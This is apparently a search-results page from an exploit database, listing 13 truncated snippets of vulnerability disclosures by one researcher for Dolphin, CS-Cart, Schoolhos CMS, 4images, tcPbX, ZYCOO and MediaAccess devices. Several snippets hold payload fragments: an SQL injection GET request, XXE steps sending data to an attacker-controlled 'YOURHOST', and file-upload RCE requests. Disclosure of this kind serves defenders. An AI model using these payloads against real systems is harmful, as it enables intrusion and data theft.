13 matches found
Dolphin 7.3.2 authentication bypass and command execution vulnerabilities
No description provided by source. !/usr/bin/env python -- coding: utf-8 -- ''' Software : Dolphin = 7.3.2 Auth bypass / RCE exploit Vendor : www.boonex.com Author : Ahmed sultan 0x4148 Home : 0x4148.com | https://www.linkedin.com/in/0x4148 Email : [email protected] Auth bypass trick credit go to...
CS-Cart 4.3.10 - XML External Entity Injection Vulnerability
Exploit for php platform in category web applications Software : CS-Cart Ahmed sultan 0x4148 "; echo rawurlencodebase64encode$xml; ? change YOURHOST to your server address , use the output in the following POST request Action - HOST/cs-cart/index.php?dispatch=twigmo.post Data -...
CS-Cart 4.3.10 - XML External Entity Injection
Software : CS-Cart Ahmed sultan 0x4148 "; echo rawurlencodebase64encode$xml; ? change YOURHOST to your server address , use the output in the following POST request Action - HOST/cs-cart/index.php?dispatch=twigmo.post Data - action=addtocart&data=DATAOUTPUTHERE&format=xml a GET request will be se...
Boonex Dolphin 7.3.2 - Authentication Bypass Remote Code Execution
Boonex Dolphin 7.3.2 - Authentication Bypass Remote Code Execution !/usr/bin/env python -- coding: utf-8 -- ''' Software : Dolphin = 7.3.2 Auth bypass / RCE exploit Vendor : www.boonex.com Author : Ahmed sultan 0x4148 Home : 0x4148.com | https://www.linkedin.com/in/0x4148 Email : [email protected]...
Schoolhos CMS 2.29 Remote Code Execution / SQL Injection
\x0d\x0a-----------------------------26518470919255\x0d\x0a\x0d\x0a' \ 'http://HOST/PATH/elearningku/proses.php?pilih=guru&untukdi=upload' php file can be ccessed...
Schoolhos CMS 2.29 - Remote Code Execution SQL Injection
Schoolhos CMS 2.29 - Remote Code Execution SQL Injection \x0d\x0a-----------------------------26518470919255\x0d\x0a\x0d\x0a' \ 'http://HOST/PATH/elearningku/proses.php?pilih=guru&untukdi=upload'...
4Images 1.7.13 - SQL Injection Vulnerability
Exploit for php platform in category web applications vulnerable app : 4images query$sql; Input parameter orderby is not sanitized before being passed to the sql query which lead to sql injection flaw POC GET...
4images 1.7.13 SQL Injection
vulnerable app : 4images query$sql; Input parameter orderby is not sanitized before being passed to the sql query which lead to sql injection flaw POC GET /lab/4images1.7.13/4images/admin/validateimages.php?action=validateimages&orderby=extractvalue1,concat0x7e,version&direction=ASC&limitnumber=1...
tcPbX - tcpbx_lang Local File Inclusion
tcPbX - tcpbxlang Local File Inclusion Vulnerable hardware : tcpbx voip distro Vendor : www.tcpbx.org Author : Ahmed sultan @0x4148 Email : [email protected] Summary : According to the vendor's site , tcPbX is a complete and functional VoIP phone system based on Asterisk open source software and...
ZYCOO IP Phone System - Remote Command Execution
ZYCOO IP Phone System - Remote Command Execution Vulnerable hardware : ZYCOO IP phone system Vendor : zycoo.com Author : Ahmed sultan @0x4148 Email : [email protected] Summary : According to the vendor's site , CooVox Series IP Phone System is the most innovative solution for VoIP telecommunicatio...
ZYCOO IP Phone System - Remote Command Execution
Vulnerable hardware : ZYCOO IP phone system Vendor : zycoo.com Author : Ahmed sultan @0x4148 Email : [email protected] Summary : According to the vendor's site , CooVox Series IP Phone System is the most innovative solution for VoIP telecommunication in SMB Small and Medium-sized Business market...
MediaAccess TG788vn - Unauthenticated File Disclosure
Exploit for hardware platform in category web applications Vulnerable hardware : MediaAccess TG788vn with Cisco http firewall Author : Ahmed Sultan 0x4148 Email : email protected MediaAccess TG788vn with Cisco firewall http config is vulnerable to critical unauthenticated file disclosure flaw, PO...
MediaAccess TG788vn - File Disclosure
Vulnerable hardware : MediaAccess TG788vn with Cisco http firewall Author : Ahmed Sultan 0x4148 Email : [email protected] MediaAccess TG788vn with Cisco firewall http config is vulnerable to critical unauthenticated file disclosure flaw, POC Request: POST /scgi-bin/platform.cgi HTTP/1.1 Host:...